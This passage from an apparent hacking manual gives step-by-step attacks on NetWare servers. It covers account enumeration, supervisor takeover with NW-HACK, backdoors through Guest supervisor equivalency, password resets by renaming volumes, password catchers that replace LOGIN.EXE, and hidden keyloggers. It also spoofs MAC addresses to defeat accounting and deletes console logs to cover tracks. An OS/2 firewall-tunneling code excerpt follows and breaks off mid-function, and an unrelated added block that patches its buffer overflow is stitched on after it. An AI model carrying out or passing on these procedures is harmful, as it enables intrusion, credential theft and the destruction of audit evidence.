• What if you don’t have access? In this case, you can’t try just any account name at the
LOGIN prompt. It will ask you for a password, whether the account name is valid or not; and
if it is valid and you guess the wrong password, you could be letting the administrators know
what you’re up to if Intruder Detection is on.
• To determine whether an account is valid, from a DOS prompt, use a local copy of
MAP.EXE. After you’ve loaded the NetWare TSRs up through NETX or VLM, try to map a
drive using the server name and volume SYS, for example:
MAP G:=TARGET_SERVER/SYS:APPS <enter>
• Since you are not really logged in, you will be prompted for a login ID. If it is a valid ID, you
will be prompted for a password. If not, you will immediately receive an error. Of course, if
there is no password for the ID you chose to use, you will be attached and mapped to the
server.
• You can do the same thing with ATTACH.EXE:

ATTACH TARGET_SERVER/loginidtotry <enter>
• Again, if this is valid, you will be prompted for a password; if not, you’ll get an error.
• Other means to obtain supervisor access. This technique is most effective in NetWare
version 3.11. When the Supervisor is logged in, a program called NW-HACK.EXE does the
following:
1. The Supervisor password is changed to SUPER_HACKER.
2. Every account on the server is modified as supervisor equivalent.
• Leaving a backdoor open, redux. When hackers have access to a system, they want a way
back in that has supervisor equivalency. You can use SUPER.EXE, written for the express
purpose of allowing the nonsupervisor user to toggle on and off supervisor equivalency. If
you used NW-Hack to obtain access, you can turn on the toggle before the administrator
removes your supervisory equivalency. If you gain access to a supervisor-equivalent account,
give the guest account super equivalency, then log in as Guest and toggle it on as well. At this
point, get back in as the original supervisor account, and remove the supervisor equivalency.
Now Guest can toggle on supervisor equivalency whenever convenient.
• Getting supervisor access, redux. If you have two volumes or some unallocated disk space,
you can use this hack to get supervisor access:
1. Dismount all volumes.
2. Rename SYS: to SYSOLD:.
3. Rename VOL1: (or equivalent) to SYS:; or just create a new SYS: on a new disk.
4. Reboot the server.
5. Mount SYS: and SYSOLD:.
6. Attach to the server as Supervisor (note: login not available).



7. Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD.
8. Dismount volumes.
9. Rename volumes back to the correct names.
10. Reboot the server again.
11. Log in as Supervisor, this time with no password.
12. Run BINDREST.
At this point, you should be logged in as the supervisor. With these privileges, you can create a new
user as supervisor-equivalent, then use this new user to reset the supervisor’s password.
Passwords
• Accessing the password file. When accessing the password file in NetWare, all objects and
their properties are kept in the bindery files in versions 2x and 3x, and in the NDS database in
version 4.x. An example of an object might be a printer, a group, an individual’s account, and
so on. An example of an object’s properties might include an account’s password or full
username, a group’s member list, or full name. The bindery file’s attributes (or flags) in
versions 2x and 3x are denoted as Hidden and System. These files are located on the SYS:
volume in the SYSTEM subdirectory as follows:
Version 2x: NET$BIND.SYS, NET$BVAL.SYS
Version 3x: NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
NET$BVAL.SYS and NET$VAL.SYS are the actual storage locations for passwords in versions 2x
and 3x, respectively. In version 4.x, however, the files are physically located in a different location.
By using the RCONSOLE utility and Scan Directory option, you can see the files in SYS:_NETWARE:
VALUE.NDS: Part of NDS
BLOCK.NDS: Part of NDS
ENTRY.NDS: Part of NDS
PARTITIO.NDS: Type of NDS partition
MLS.000: License
VALLINCEN.DAT: License validation
• More on cracking passwords. As with most insecure LANs, for purposes of this discussion,
we’ll assume that Intruder Detection is turned off and that unencrypted passwords are
allowed. If you have access to the console, either by standing in front of it or via
RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM, or SETPWD.NLM to reset
passwords simply by loading the NLM and passing command-line parameters:

NLM           ACCOUNT(S) RESET     NETWARE VERSION(S) SUPPORTED
SETSPASS.NLM  Supervisor           3x
SETSPWD.NLM   Supervisor           3x, 4x
SETPWD.NLM    Any valid account    3x, 4x



If you can plant a password catcher or keystroke reader, you can get access to them with
LOGIN.EXE, located in the SYS:LOGIN directory. The best place to put a keystroke capture
program is in the workstation’s path, with the ATTRIB set as hidden. The advantage to that action is
that you’ll capture the password without NetWare knowing about it. An alternative is to replace
LOGIN.EXE with the itsme program. This program, coupled with PROP.EXE, will create a separate
property in the bindery on a version 2x or 3x server that contains the passwords. Here are the steps to
perform when using these tools:
1. Gain access to a workstation logged in as Supervisor or equivalent (or use another technique,
as described elsewhere).
2. Run the PROP.EXE file with a -C option. This creates the new property for each bindery
object.
3. Replace the LOGIN.EXE in the SYS:LOGIN directory with the itsme version.
4. Keep PROP.EXE on a floppy, and check the server with any valid login after a few days.
5. To check for captured passwords, type PROP -R after logging in. This can be redirected to a
file or printer.
Accounting and Logging
• Defeating accounting. Accounting is Novell’s technique for controlling and managing
access to the server. The administrator sets up charge rates based on blocks read and written, service
requests, connect time, and disk storage. The account “pays” for the service out of a balance it has
been given, and the accounting server deducts for each of these items. Any valid account,
including nonsupervisor accounts, can check to see if Accounting is active simply by running
SYSCON and attempting to access Accounting.

To defeat Accounting, you must turn it off by taking three simple steps:
1. Spoof your address. This will depend on the network interface card (NIC); typically, you can
do it in the Link Driver section of the NET.CFG file by adding the following line:
NODE ADDRESS xxxxxxxxxxxx
where xxxxxxxxxxxx is the 12-digit MAC layer address.
2. If you are using a backdoor, activate it with SUPER.EXE.
3. Delete Accounting by running SYSCON, then selecting Accounting, Accounting Servers,
and hitting the Delete key. The last entry in the NET$ACCT.DAT file will be your login,
time-stamped with the spoofed node address.
• Defeating logging. These steps require console and Supervisor access:
1. Type MODULES at the console. Look for the CONLOG.NLM to verify active logging.
2. Look on the server in SYS:ETC for a file called CONSOLE.LOG, a plain text file that you
can edit, though not while CONLOG is running.
3. Unload CONLOG at the console.
4. Delete or edit the CONSOLE.LOG file to erase the evidence of your tracks.
5. Reload CONLOG.
6. Check the CONSOLE.LOG file to ensure the owner has not changed.
7. Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG.
Files and Directories
• Viewing hidden files. Use NDIR to see hidden files and directories: NDIR *.* /S /H.
• Defeating the execute-only flag. If a file is flagged as execute-only, it can still be opened.
Try opening the file with a program that will read in executables, and perform a Save As (to
another location).
• Editing login scripts. Login scripts are stored in SYS:_NETWARE. Unlike the binary files
used in NDS, these files are completely editable by using EDIT.NLM. Performing an
RCONSOLE directory scan in SYS:_NETWARE will turn up files with extensions such as
.000, which are probably login scripts. For example, suppose you found 00021440.000:
LOAD EDIT SYS:_NETWARE\00021440.000
If it’s a login script, you’ll be able to edit and save it. This completely bypasses NDS security, and is
the main weakness here. As a result, you can use this to grant a user extra rights that can lead to a
number of compromises, including full access to the file system of any server in the tree.
OS/2
With excellent ratings and customer feedback, it’s a mystery why this operating system hasn’t
achieved greater market predominance. IBM’s OS/2 (/www-4.ibm.com/software/os/warp) had
compatibility and stability problems until version 2.0 was released in 1992. Since the addition of a new
object-oriented GUI, stable DOS compatibility, and resilient Windows software compatibility, OS/2
sales have been steadily growing. IBM’s recent release, version 4, comes standard with all of the
bells and whistles deemed necessary by consumers. The OS/2 System folder contains all the tools
necessary to manage a PC, from folder templates to desktop schemes with drag-and-drop fonts
and colors. And connectivity configuration is a walk in the park, from the Internet and file/print servers
to peer networks (see Figure 10.19).
Liabilities
Tunneling
Synopsis: Defense perimeter tunnel attack through firewall and/or proxy.

Figure 10.19 OS/2 modifications.
Hack State: Security perimeter bypass for unauthorized access.
Vulnerabilities: All flavors.
Breach: Excerpt from Os2tunnel/http.c.
Os2tunnel/http.c
#include <Inc Mods> /* the book's placeholder for the original include directives */
static inline ssize_t
http_method (int fd, Http_destination *dest,
Http_method method, ssize_t length)
{
char str[1024]; /* FIXME: possible buffer overflow */
Http_request *request;
ssize_t n;
if (fd == -1)
{
log_error ("http_method: fd == -1");
return -1;
}
if (dest->proxy_name == NULL)
sprintf (str, "/index.html");
else
sprintf (str, "http://%s:%d/index.html", dest->host_name, dest->host_port);
request = http_create_request (method, str, 1, 1);
if (request == NULL)
return -1;
sprintf (str, "%s:%d", dest->host_name, dest->host_port);
http_add_header (&request->header, "Host", str);
if (length >= 0)
{
sprintf (str, "%d", length);
http_add_header (&request->header, "Content-Length", str);
}
http_add_header (&request->header, "Connection", "close");
if (dest->proxy_authorization)
{
http_add_header (&request->header,
"Proxy-Authorization",
dest->proxy_authorization);
}
if (dest->user_agent)
{
http_add_header (&request->header,
"User-Agent",
dest->user_agent);
}
n = http_write_request (fd, request);
http_destroy_request (request);
return n;
}
ssize_t
http_get (int fd, Http_destination *dest)
{
return http_method (fd, dest, HTTP_GET, -1);
}
ssize_t
http_put (int fd, Http_destination *dest, size_t length)
{
return http_method (fd, dest, HTTP_PUT, (ssize_t)length);
}
ssize_t
http_post (int fd, Http_destination *dest, size_t length)
{
return http_method (fd, dest, HTTP_POST, (ssize_t)length);
}
int
http_error_to_errno (int err)
{
/* Error codes taken from RFC2068. */
switch (err)
{
case -1: /* system error */
return errno;
case -200: /* OK */
case -201: /* Created */
case -202: /* Accepted */
case -203: /* Non-Authoritative Information */
case -204: /* No Content */
case -205: /* Reset Content */
case -206: /* Partial Content */
return 0;
case -400: /* Bad Request */
log_error ("http_error_to_errno: 400 bad request");
return EIO;
case -401: /* Unauthorized */
log_error ("http_error_to_errno: 401 unauthorized");
return EACCES;
case -403: /* Forbidden */
log_error ("http_error_to_errno: 403 forbidden");
return EACCES;
case -404: /* Not Found */
log_error ("http_error_to_errno: 404 not found");
return ENOENT;

case -411: /* Length Required */
log_error ("http_error_to_errno: 411 length required");
return EIO;
case -413: /* Request Entity Too Large */
log_error ("http_error_to_errno: 413 request entity too large");
return EIO;
case -505: /* HTTP Version Not Supported */
log_error ("http_error_to_errno: 505 HTTP version not supported"); /* message said 413 in the excerpt; the case is 505 */
return EIO;
case -100: /* Continue */
case -101: /* Switching Protocols */
case -300: /* Multiple Choices */
case -301: /* Moved Permanently */
case -302: /* Moved Temporarily */
case -303: /* See Other */
case -304: /* Not Modified */
case -305: /* Use Proxy */
case -402: /* Payment Required */
case -405: /* Method Not Allowed */
case -406: /* Not Acceptable */
case -407: /* Proxy Authentication Required */
case -408: /* Request Timeout */
case -409: /* Conflict */
case -410: /* Gone */
case -412: /* Precondition Failed */
case -414: /* Request-URI Too Long */
case -415: /* Unsupported Media Type */
case -500: /* Internal Server Error */
case -501: /* Not Implemented */
case -502: /* Bad Gateway */
case -503: /* Service Unavailable */
case -504: /* Gateway Timeout */
log_error ("http_error_to_errno: HTTP error %d", err);
return EIO;
default:
log_error ("http_error_to_errno: unknown error %d", err);
return EIO;
}
}
static Http_method
http_string_to_method (const char *method, size_t n)
{
if (strncmp (method, "GET", n) == 0)
return HTTP_GET;
if (strncmp (method, "PUT", n) == 0)
return HTTP_PUT;
if (strncmp (method, "POST", n) == 0)
return HTTP_POST;
if (strncmp (method, "OPTIONS", n) == 0)
return HTTP_OPTIONS;
if (strncmp (method, "HEAD", n) == 0)
return HTTP_HEAD;
if (strncmp (method, "DELETE", n) == 0)
return HTTP_DELETE;
if (strncmp (method, "TRACE", n) == 0)
return HTTP_TRACE;
return -1;
}
static const char *
http_method_to_string (Http_method method)
{
switch (method)
{
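The excerpt above flags its own weak spot: http_method formats a host name and port from the configuration into a fixed str[1024] with sprintf. Added here as an example (not httptunnel's own code) is the bounded form of those three formatters, which reject an overlong value instead of writing past the buffer; the function names fmt_bounded, request_target, host_header and overflow_is_rejected are assumptions.

```c
/* Added example, not httptunnel's own code: bounded replacements for the sprintf()
 * calls into str[1024] marked "FIXME" in http_method(). Names are assumptions. */
#include <errno.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
/* vsnprintf into buf[cap]; returns bytes written, or -1 with errno = ERANGE when
 * the result would not fit. The buffer is emptied, not left partially filled. */
static int fmt_bounded(char *buf, size_t cap, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(buf, cap, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= cap) {
        if (cap > 0)
            buf[0] = '\0';
        errno = ERANGE;
        return -1;
    }
    return n;
}
/* Request target exactly as http_method() builds it: "/index.html" when talking
 * to the server directly, an absolute URI with the port when going via a proxy. */
int request_target(char *buf, size_t cap, const char *host, int port, int via_proxy)
{
    if (!via_proxy)
        return fmt_bounded(buf, cap, "/index.html");
    return fmt_bounded(buf, cap, "http://%s:%d/index.html", host, port);
}
/* Value of the Host header, "host:port". */
int host_header(char *buf, size_t cap, const char *host, int port)
{
    return fmt_bounded(buf, cap, "%s:%d", host, port);
}
/* Edge case: a constructed host name longer than the original 1024-byte str[].
 * Returns 1 when the overflow is rejected and the buffer left empty, else 0. */
int overflow_is_rejected(void)
{
    char longhost[1500];
    char str[1024];
    memset(longhost, 'a', sizeof longhost - 1);
    longhost[sizeof longhost - 1] = '\0';
    if (request_target(str, sizeof str, longhost, 80, 1) != -1)
        return 0;
    return errno == ERANGE && str[0] == '\0';
}
```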